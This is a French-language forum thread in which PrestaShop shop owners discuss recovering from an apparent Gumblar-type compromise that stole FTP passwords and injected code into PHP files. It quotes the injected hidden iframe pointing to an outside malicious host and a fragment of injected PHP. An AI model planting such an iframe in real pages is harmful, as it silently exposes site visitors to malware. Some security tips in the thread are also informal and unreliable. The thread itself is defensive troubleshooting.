site hacké

[axelpaq]

bonsoir à tous.

voilà notre site a été hacké c'est la grosse galère....
le fichier index.php se termine par ces mots:
<iframe src="http://u0r.in:8080/ts/in.cgi?pepsi106" width=125 height=125 style="visibility: hidden"></iframe>

tous les fichiers index.php se sont fait zigouillés (suffit de voir les dates de modification). bref faut réinstaller Prestashop.

alors du coup je souhaiterais vous demander conseil sur 2 points si ça ne vous dérange pas:
1. que sauvegarder dans Prestashop ?
2. comment se protéger pour que cela ne se reproduise plus à l'avenir.

1. sauvegarde de PS pour réinstall
mon 1er réflexe a été de sauvegarder la base de données (sous phpMyAdmin car je n'ai même plus accès au backoffice de Prestashop...).
par contre après je ne sais pas quoi sauvegarder de plus. le but du jeu est de réinstaller Prestashop, copier les fichiers, importer la BDD est roule.
- où se trouvent les images ?
- nous n'avons pas de thème. nous utilisions le thème par défaut.
- quoi d'autre ?

2. se protéger pour que cela ne recommence pas
que faire pour que cela ne se reproduise plus ? faut-il que je contacte mon hébergeur ?

je vous remercie pour vos réponses. là c'est un peu le feu...

[mandrake]

...Il y a vraiment des cons qui n'ont que ça à faire de leurs journées...
Bon courage, même si je sais que cela ne fera pas revenir ton site!
Avais-tu protégé ton site par un .htacess?

Cordialement,

Mandrake.

[axelpaq]

oui vraiment c'est rageant. on venait juste de le terminer... heureusement juste un achat Paypal. donc pas de dégâts irréversibles.

non je ne l'avais pas protégé par un .htaccess. je pensais justement faire toutes les démarches de sécurité cette semaine. ça m'apprendra. dorénavant je commencerais pas ça. on va dire que c'est le métier qui rentre.

[mandrake]

Tu dois avoir un hébergeur qui accepte "l'url rewriting", cela te permet de renommer le fichier htaccess.txt en .htaccess et ainsi protéger ton site.
Ensuite tu crées un fichier .htaccess avec le code suivant dans ton dossier "thèmes" :


Deny from all



C'est une seconde sécurité qui protégera également l'accès à ton thème des regards...indiscrets...
Malgré cela tu auras toujours un petit malin qui arrivera à rentrer, mais bon, avec tu seras déjà bien à l'abri!

Cordialement,
Mandrake.

[Atch]

Salut,

Dans l'ordre, modifies tes acces FTP (mot de passe)

ensuite, controle bien, mais en rêgle général, ce virus infecte tous les fichiers index.PHP

et si c'est le cas et vu le nombre d'index dans Presta, le mieux seraitde ré-installer Presta pour etre sure de ne pas en oublier....

Bon courage.

V++

atch

[sofred]

Il faut faire régulièrement des sauvegardes de tes bases de données, et des fichiers images ainsi que de ton thème. Pour la réinstallation tu gagnes un peu de temps. L'idéal (on le trouve sur des semi-dédiés ou dédiés) ce sont les back up qui sauvegardent d'une manière automatique ou manuelle le contenu. Il faut également modifier les ftp très réguliérement. C'est pour ces raisons qu'il faut faire le bon choix en matière d'hébergeur et fuyez les gratis ou pas trop cher : Tout se paye (on le dit toujours pas assez ! Nous avons déja la chance d'avoir Prestashop en open source, donc on peut lâcher un peu pour un hébergement correct...)
De toutes les façons il n'y a pas de solutions miracles juste des précautions pour ne pas tomber dans la routine et de se dire "que ça n'arrive qu'aux autres".
Dans tous les cas, bon courage !!!

[nicolas92]

Bienvenue au club de ceux qui se sont fait hackés...pareil pour moi il y a une semaine et pourtant c'est comme les cambriolages, normallement cela n'arrive qu'aux autres... Tout mes .php ont été modifiés avec rajout d'un refresh vers une url. J'ai juste tout rapatrié, fait un chercher remplacer pour éliminer cet ajout et tout renvoyé. Et surtout j'ai modifié mon psw ftp avec un psw que j'arrive pas a retenir moi même...
En parallèle, mise a jour de mon antivirus/trojan, back up de tout le site sur sauvegarde physique, etc...bref, je suis devenu assez parano car j'ai bouffé plus de 12 heures a réparer cette connerie + quelques ventes ratées car le site ne s'affichait plus.

[Fluorite]

bonjour à tous

Wouah ça fait peur .

C’est bien de mettre un .htacess ,mais cela ne serviras absolument à rien s’il y'a eu une injection ou toute autre manipulation (Faille).

Quelle version de prestashop avez vous ?
Il faudrait aussi voir vos log afin de trouver la source de l'injection.
@++
Yannick

Ps:Bizarre que cela n'alerte en rien les développeurs ou les modérateurs...

[Patric]

Bizarre que cela n'alerte en rien les développeurs ou les modérateurs...

Si ce sont les mots de passe FTP qui se font casser, on n'y pourra pas grand chose. Je serais curieux de connaitre la force des mots de passe en question.

Après, si effectivement il est mis en évidence que ces problèmes viennent de failles dans PrestaShop, il est clair qu'on se sent concernés.
Si toute personne a des infos à ce sujet, n'hésitez pas !

[Atch]

ce virus s'attaque à tous les sites et pas seulement Prestashop.

Certains pensent à une faille de Filezilla et que les codes FTP sont ainsi récupérés.

V++

Atch

[nicolas92]

J'utilise effectivement filezilla.....si il y a une faille à ce niveau c'est inquiétant.
Par contre je ne pense pas a une faille prestashop, un autre de mes sites en html+php hébergé sur le même compte ovh a eu ses fichiers .php pollués de la même façon.

Si ce sont les mots de passe FTP qui se font casser, on n’y pourra pas grand chose. Je serais curieux de connaitre la force des mots de passe en question.

Le mot de passe que j'utilisais ressemblait à celui ci : k2768bourgogne
Pas assez costaud car une partie en dictionnaire ? (bourgogne)

[Marc]

Bonjour
Pour gérer mes mots de passe j'utilise keepass qui permet de retenir mes mots passes mais aussi de les générer
du genre :

[ol[smGp8u6O*5!McT;
YO6gx?`Txvof0]#'jwX?4L3,m9^uelib2KWE'

Je pense que ce n'est pas sure à 100% mais à voir la complexité cela rassure.

[Alekhine]

L'an dernier je me suis fait hacker un forum, mais on voyait bien que c'était un travail de robot puisque l'accès au ftp n'avait servi qu'à y coller des script pour spammer (un gugus aurait pu tout démonter sans problème).

Même si j'avais eu des password de 3 mètres de long ça n'aurait rien changé puisque j'avais choppé un virus sur mon PC qui avait collecté mes mot de passe FlashFXP

Heureusement chez 1and1 ils ont réagi à la première salve de spam, version courte : "vous avez 48h pour désinfecter votre hébergement, sinon COUIC" ^^

Donc voilà :/ depuis j'ai arrêté avec les antivir gratos, paranoïaques pour des broutilles, mais qui ont laissé passer ça... (Kaspersky c'est mieux lol)
Mes nouveaux mots de passe sont des phrases (min/MAJ/NUM), changé régulièrement, et jamais stocké (oui c'est chiant de les taper à chaque fois, mais moins que de réinstaller un forum ET une boutique)

Donc finalement je verrais bien le même cas de figure ici : le piratage des mots de passe, tout simplement.

[Marc]

Au sujet des virus y-a-t-il moyen de scanner son site ?

[axelpaq]

un grand merci à tous pour vos réponses et vos conseils.

suite au hack, j'ai réalisé que dans l'excitation d'ouvrir la boutique j'ai zappé les notions essentielles de sécurité:
le pwd du ftp n'est pas compliqué, je vais essayer la solution d'un générateur de clé
mettre le .htaccess
mettre un antivirus/trojan (au fait vous faites comment ? vous mettez ça sur le serveur ?)

je penche pour un truc qui ne s'est pas attaqué spécifiquement à PrestaShop (la faille de sécu dont vous parliez) car notre blog (sur WordPress) y'est passé aussi.

fort heureusement nous étions au tout tout début et donc une réinstall de PS ne sera pas bien méchante.

je me permets de garder ce post ouvert si jamais j'ai des questions.

merci encore.

[jeckyl]

Bon, il semble que beaucoup de sites se sont fait hacker en ce mois de juillet.

Et il semble que vous soyez tous sur PC.

Donc, je suis assez content d'avoir switché.

Bon je sort

[Alekhine]

Pour sortir c'est "Pomme-Eject" :-D

[Fluorite]

Bonjour à tous

nicolas92 et les autres personnes ayant un compte OVH je vous rappel que vous pouvez utilise SFTP en utilisant SSH2 de façon à cryptée votre connexion FTP et de ne pas être oblige de donner votre MDP voir le guide OVH pour la mise en place avec Filzilla ou autres FTP.

Il en est de même pour votre courrier ou vous pouvez utilise SMTP+TLS ,pareil pour Crypte vos messages.

Dernier point essentielle ,ne jamais mettre c'est MDP sur le PC ,mais plutôt sur un Agenda .

vos MDP doivent faire au moins 8 Caractères Alphanumérique.

Voilà si cela peut servir pour certains.

Guide OVH SFTP

Vraiment c'est n'importe quoi, ceux qui font cela et ce ne sont pas des Hackers mais des Crackers ou des Lamers

Toujours est t'il qu'il faut regarder vos Log FTP ,ligne par ligne ,et même tous les logs même ce d'Apache .

Pensez a faire des sauvegardes régulièrement,par exemple avec des Taches CRON (tout automatique).
voila pour le petit mot.

bonne journée Yannick

[bokeop]

bonjour a tous

petite info sur ce sujet de site hacke et precisement sur ces iframes rajoutees sur des index. J'ai eu le meme probleme au debut du mois

il s'agit d'un virus voleur de mot de passe ftp (il recupere les pass dans filezilla mais aussi pas mal d'autres clients ftp)

Faites des recherches sur Gumblar ou Trojan.PWS.Tupai.A virus : ce virus s'attrape via un site contamine. (a ma connaissance seul chrome le voit et restreint l'acces). Le virus vole vos mots de passe ftp et inscrit du code dans les pages d'index (des iframes), qui vont contaminer a nouveau d'autres personnes..

Le mieux a faire en premier c'est de verifier que vous n'etes pas infecte, (il est tres probable que vous l'etes), avant de changer le ftp.

Et pour ne rien risquer utiliser SFTP ou ne pas storer de passwords..

[axelpaq]

c'est exactement ce qui s'est passé bokeop.

bon j'ai essayé de réparer PrestaShop en remplaçant tous les index.php par leurs équivalents venant d'un dézippage frais de PS. si globalement ça fonctionne, pour les modules c'est pas terrible. et puis de toute manière ça fait vraiment un truc tout pourri et de savoir que ça tient de bric et de broc ça me plaît pas des masses.

bon alors la BDD n'est pas infectée par quoi que ce soit donc je peux la réutiliser.

si je comprends bien donc il me faut "simplement" supprimer PS et le réinstaller. oui mais y'a des photos qui sont associées aux produits, etc... comment je peux faire pour que les photos soient réassignées aux bonnes images automatiquement ?

[Alekhine]

si je comprends bien donc il me faut "simplement" supprimer PS et le réinstaller. oui mais y'a des photos qui sont associées aux produits, etc... comment je peux faire pour que les photos soient réassignées aux bonnes images automatiquement ?

Il n'y a aucun problème avec ça puisque les produits sont dans la DB, ils ont chacun un index qui est repris dans la table ps_image pour construire le nom du fichier.

Il faut donc simplement récupérer les images et les copier dans la nouvelle install (ainsi que les autres choses personnalisées tel que le thème, les mails, etc...)

[edit]
a mon avis il faut procéder comme pour un update de PS, à peu de chose près

[axelpaq]

tout compris, merci

est-ce que ça va si je sauvegarde tout le dossier img et que j'écrase celui que PS me créera lors de l'install ?

une commande avait été passée. dois-je sauvegarder quelque chose en rapport avec ça ?

de toute manière j'ai rapatrié la boutique en local (si jamais y'a un truc qui foire).

[Alekhine]

Je n'ai pas regardé dans le détail mais je pense que oui.

Regardez ce lien et inspirez-vous de la partie "Update", vous récupèrerez forcément le nécessaire et bien entendu vous conserverez la commande puisqu'elle aussi est en DB...

Dans tous les cas conservez une sauvegarde de l'ancien dossier PS en lieu sûr en cas de ratage ^^

EDIT: évidemment j'avais oublié le lien lol http://www.prestashop.com/wiki/Installing_And_Updating_PrestaShop_Software/

[axelpaq]

super. merci encore. je pense qu'avec tout ça ça va être bon

[axelpaq]

bon j'ai bien lu la doc mais je n'ai pas trouvé:
est-il possible de réutiliser une BDD existante lors de l'installation de PS ?

ou alors dans PS comment fait-on pour importer une BDD ?

[Patric]

Pour importer une BDD, il te faut utiliser l'outil PHPMyAdmin. Tu trouveras une options Import qui te permettra de spécifier le fichier de sauvegarde à importer.

[NaitreGitan]

bonjour à tous,

même problème que vous :

Warning: Unexpected character in input: ''' (ASCII=39) state=1 in /homez.170/accordeuu/www/index.php on line 9

Parse error: syntax error, unexpected '/' in /homez.170/accordeuu/www/index.php on line 9

D'où vient la faille ? ftp ? prestashop ?

Si ftp, pas quel moyen ?

Possible que ce soit en installant des thèmes ?

Merci de vos réponses

[Patric]

bonjour à tous,

même problème que vous :

Warning: Unexpected character in input: ''' (ASCII=39) state=1 in /homez.170/accordeuu/www/index.php on line 9

Parse error: syntax error, unexpected '/' in /homez.170/accordeuu/www/index.php on line 9

D'où vient la faille ? ftp ? prestashop ?

Si ftp, pas quel moyen ?

Possible que ce soit en installant des thèmes ?

Merci de vos réponses

Heu, je crois que tout a déjà été expliqué dans les posts précédents.

[NaitreGitan]

Oui, justement TOUT a été expliqué mais aucune raison n'a clairement été définie.

Donc la seule solution si j'ai bien compris serait d'utiliser SFTP ?

[NaitreGitan]

Re,

Parmis les personnes qui ont eux ce problème,
avez vous installé récemment des templates que vous avez téléchargé sur le net ?

merci

[NaitreGitan]

Quelle est la procèdure à faire après avoir été piraté ?

- changer le mot passe du ftp (sur ovh, pour ma part)
- se connecter en SFTP avec filezilla pour tranférer ses fichiers prestashop
- réinstaller prestashop

C'est tout ? C'est bien ça ?

J'ai essayer de me logger en SFTP en faisant la manipulation suivante :

sur Filezilla :
- fichier->gestionnaire de sites
- nouveau site
hôte : ftp.monsite.fr (j'ai vu sur certain site qu'il fallait mettre ssh au lieu de ftp)
port : 22
type de serveur : SFTP
Type d'authentification : Normale
Ensuite, j'ai rentré mon identifiant et mot de passe.

J'ai cliqué sur connexion. Et là, connexion impossible :
Erreur : ssh_init: Host does not exist
Erreur : Impossible d'établir une connexion au serveur

Si quelqu'un pouvait m'éclaircir sur le soucis et la précédure que je viens d"enoncer, ça serait super cool
merci

[Alekhine]

bon j'ai bien lu la doc mais je n'ai pas trouvé:
est-il possible de réutiliser une BDD existante lors de l'installation de PS ?

ou alors dans PS comment fait-on pour importer une BDD ?

Hello,

Ah oui j'avais pas pensé à ça.
En ce qui me concerne je créerais une nouvelle base pour l'installation et ensuite j'irais dans le fichier de config mettre les Nom/Login/Pass de l'ancienne base (puis détruire la DB qui n'a servi qu'à l'install).

Si vous ne pouvez pas créer de DB supplémentaire sur votre hébergement il faudra, coimme le disait Patric, importer le contenu de l'ancienne DB dans la nouvelle.

[Marc]

Je pense que si tu fais comme une mise à jours de la boutique ca devrait fonctionner :wow:
http://www.prestashop.com/forums/viewthread/5609

[Marie]

Si je peux apporter ma pierre à l'édifice...

Mon site a également été hacké il y a quelques mois, fort heureusement il n'était pas terminé.

J'ai tout réinstallé puis j'ai inséré un script anti hack.

Voilà une adresse qui peut toujours servir : http://www.crawltrack.net/fr/documentation.php

Marie

[axelpaq]

la mise à jour n'a pas voulu fonctionner (je pense à cause des fichiers qui avaient été modifiés).

bref ce que j'ai fait:
- sauvegarde BDD
- suppression BDD
- création de la BDD dans phpMyAdmin avec les utilisateurs
- installation d'une version toute propre de PrestaShop
- suppresion de la structure de la BDD créée et importation de la BDD que j'avais sauvegardé

=> nickel ça marche. je retrouve mes commandes, mes clients, mon catalogue... super.

mais j'ai encore un petit soucis (et après juré je vous laisse tranquille

la page d'accueil s'affiche très bien. cependant lorsque je veux cliquer sur une catégorie ou un produit j'ai un message d'erreur.
par exemple lorsque je clique sur la catégorie "Bateaux" j'ai ce message d'erreur:

Not Found
The requested URL /boutique/7-bateaux was not found on this server.

je croyais que ça c'était dans la BDD non ? savez-vous comment je peux faire pour bien accéder à mes catégories s'il vous plaît ?

[Alekhine]

Ton répertoire d'installation se nomme encore "boutique" ? sinon forcément...

[axelpaq]

oui oui. .
j'ai bien la page d'accueil (avec toutes les catégories, les produits, toussa) mais dés que je clique sur une catégorie, un produit ou même les mentions légales par exemple et bien j'ai un message d'erreur. je vérifie quand même si j'ai pas sauté une étape dans l'installation mais visiblement non...

[axelpaq]

bon alors j'aurais apparemment réussi à régler le problème: la réécriture d'url n'est pas activée sur le serveur.

[axelpaq]

ok all is now under control:
- réécriture d'url activée
- htaccess.txt renommé en .htaccess

et ça fonctionne du feu de dieu.

vraiment un grand merci à tous pour votre aide très très précieuse.
un merci tout spécial à Alekhine

je peaufine les derniers détails et je sécurise tout ça pour que cela ne se reproduise plus

[zaga]

tu peux utiliser cron pour faire des sauvegardes de tes bases de données car le plus important c'est ca.

[Snooppy]

Bonjour à tous

Bon je vient de tomber sur le topique , et à vrai dire une fois que l'on es tomber sur ce virus ( qui est très bien compilé), une ré-installe de presta ne va pas changé grand chose ,....enfin si juste éviter d'être BL par Google ( Firefox) comme site potentiellement dangereux.

Cependant voici les manipulations pour être définitivement Tranquille pour un moment :


1.) Télécharger (Gratuit) & Installez avec Maj :

Installez en 1er Avast ensuite faite les mise à jour (Obligatoire pour la suite)

AVAST FAMILIALE :

http://files.avast.com/files/latest/avast_home_setup.exe

Antivirus & Avir (Obligatoire pour la suite)

http://www.01net.com/telecharger/windows/Securite/antivirus-antitrojan/fiches/13198.html

Pour cette exemple Avast & Avira cohabite bien entre eux et sans probléme détecte pour ma part . Car quand un ne détecte pas l'autre prend sa place .

2.) Désolez mais té bien partis pour la réinstalle ( c'est ce que j'ai fait pour ma part car les anti-virus ne le détecte peu ou sinon il apparait comme A000256325.exe tu le verra dans les fichier temps ou à la racine du disque quelque chose dans le genre ) Bref essaye de le supprime même Mode sans échec , il fait planter ta mémoire . écran de la mort ( écran bleue).

Bref à toi de choisir .

3.) Supprime la totalité des fichiers infecter , lors du Scan de Avast que tu aura réglée en mode agressif !
Attention , il n'y a pas que des fichier index.php maintenant il les fait un peu tous .



4.) Niveau hébergement Supprime directement le fichier www et recrée le avec comme chwo 705 , vérifie les autres dossiers .


Les fichiers télécharger sur ton PC de presta supprime les . re-télécharge les une fois que ton Pc et Ok au niveau infection .


Comment fonctionne t-il :

Lorsque que l'on glisse ou ouvre un fichier de type : .txt .php .html ect....

il insère ce type de code :

<?php echo '





















Êîíôåðåíöèÿ ìàíüÿêîâ ñêà÷àòü'; ?>

Voila à savoir , comment il reviendrons placé un fichier corrompu dans ton hébergement et ceux même avec un mot de assez fort

Pour info généralement ce sont des sites Russe .

[axelpaq]

salut Snoopy et merci pour tes réponses

en fait c'est un pote à moi qui s'est choppé le virus => virus dans le site via sont ftp (étant proprio de sa boutique il a des droits d'admin dessus).
moi je vais sur le site (en url et en ftp) et sbim je me le choppe.

mon pc n'est pas infecté: au début je croyais et puis après avoir fait un coup d'Avast, d'Antivir, d'Hijackthis et bien vérifié les entrées registre avec Process Explorer, je suis maintenant sûr qu'il ne l'est pas.

d'ailleurs là je viens de rentrer de congés et donc je vais entreprendre la sécurisation de la boutique mais là je vais faire une recherche et si besoin ouvrir un nouveau post

[Julien Breux]

Bonjour,
Après avoir lu ci et là vos posts, il apparaît clairement que beaucoup de la sécurité vient de votre poste de conception / développement.
Sachez toutefois que si vous êtes chez OVH par exemple, vous avez la possibilité de gérer des clés privées / publiques SSH afin de faire du SFTP.
De cette façon, vous avez un fichier clé + une phrase magique à entrer... ce qui accroit le niveau de sécurité.
Il est vrai que Prestashop dans sa version 1.X n'est pas au point par rapport au placement des fichiers, mais ça va venir, croyez moi

Bon courage à toutes / tous, ami(e)s : Bonnes ventes

[riga]

Il m'est arrivé la même chose il y a quelque mois sur un script non prestashop.
Et même plusieurs fois en fait.
Mais a force j'ai trouvé la solution radicale : IMAC.... et là plus de problèmes de virus

Pourvu que ça dure